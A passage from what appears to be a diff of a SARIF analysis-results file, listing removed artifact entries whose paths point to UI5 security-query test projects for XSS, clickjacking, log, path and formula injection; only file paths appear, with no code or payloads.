: 138 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-default-all/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 139 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-deny-all/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 140 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-deny-all/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 141 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 142 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 143 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 144 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 145 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 146 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 147 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 148 - } - }, { - "location" : { - 
"uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 149 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 150 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 151 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 152 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 153 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 154 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 155 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 156 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 157 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 158 - } - }, { - "location" : { - 
"uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 159 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 160 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 161 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 162 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 163 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 164 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 165 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 166 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 167 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 168 - } - }, { - "location" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 169 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 170 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 171 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 172 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 173 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 174 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 175 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 176 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 177 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 178 - } - }, { - "location" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 179 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 180 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 181 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 182 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 183 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 184 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 185 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 186 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 187 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 188 - } - }, { - "location" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 189 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 190 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 191 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 192 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 193 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 194 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 195 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 196 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 197 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 198 - } - }, { - "location" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 199 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 200 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/utils/CustomLogListener.js", - "uriBaseId" : "%SRCROOT%", - "index" : 201 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 202 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 203 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 204 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 205 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 206 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 207 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 208 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 209 - } - }, { - 
"location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 210 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 211 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 212 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 213 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 214 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 215 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 216 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 217 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 218 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 219 - } - }, { - 
"location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 220 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 221 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 222 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 223 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 224 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 225 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 226 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 227 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 228 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 229 - } - }, { - "location" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 230 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 231 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 232 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 233 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 234 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 235 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 236 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/.eslintrc.json", - "uriBaseId" : "%SRCROOT%", - "index" : 237 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 238 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 239 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 240 - } - }, { - "location" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/Component.js", - "uriBaseId" : "%SRCROOT%", - "index" : 241 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 242 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js", - "uriBaseId" : "%SRCROOT%", - "index" : 243 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 244 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 245 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/model/todoitems.json", - "uriBaseId" : "%SRCROOT%", - "index" : 246 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/AllJourneys.js", - "uriBaseId" : "%SRCROOT%", - "index" : 247 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/FilterJourney.js", - "uriBaseId" : "%SRCROOT%", - "index" : 248 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/SearchJourney.js", - "uriBaseId" : "%SRCROOT%", - "index" : 249 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/TodoListJourney.js", - "uriBaseId" : "%SRCROOT%", - "index" : 250 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/arrangements/Startup.js", - "uriBaseId" : "%SRCROOT%", - "index" : 251 - } - }, { - "location" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/opaTests.qunit.html", - "uriBaseId" : "%SRCROOT%", - "index" : 252 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/opaTests.qunit.js", - "uriBaseId" : "%SRCROOT%", - "index" : 253 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/pages/App.js", - "uriBaseId" : "%SRCROOT%", - "index" : 254 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/testsuite.qunit.html", - "uriBaseId" : "%SRCROOT%", - "index" : 255 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/testsuite.qunit.js", - "uriBaseId" : "%SRCROOT%", - "index" : 256 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/AllTests.js", - "uriBaseId" : "%SRCROOT%", - "index" : 257 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/controller/App.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 258 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/unitTests.qunit.html", - "uriBaseId" : "%SRCROOT%", - "index" : 259 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/unitTests.qunit.js", - "uriBaseId" : "%SRCROOT%", - "index" : 260 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/util/Helper.js", - "uriBaseId" : "%SRCROOT%", - "index" : 261 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/view/App.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 262 - } - }, { - 
"location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 263 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 264 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 265 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 266 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 267 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 268 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 269 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 270 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 271 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 272 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 273 - } - }, { - "location" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 274 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 275 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 276 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 277 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 278 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 279 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 280 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 281 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 282 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 283 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 284 - } - }, { - "location" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 285 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 286 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 287 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 288 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 289 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 290 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 291 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 292 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 293 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 294 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 
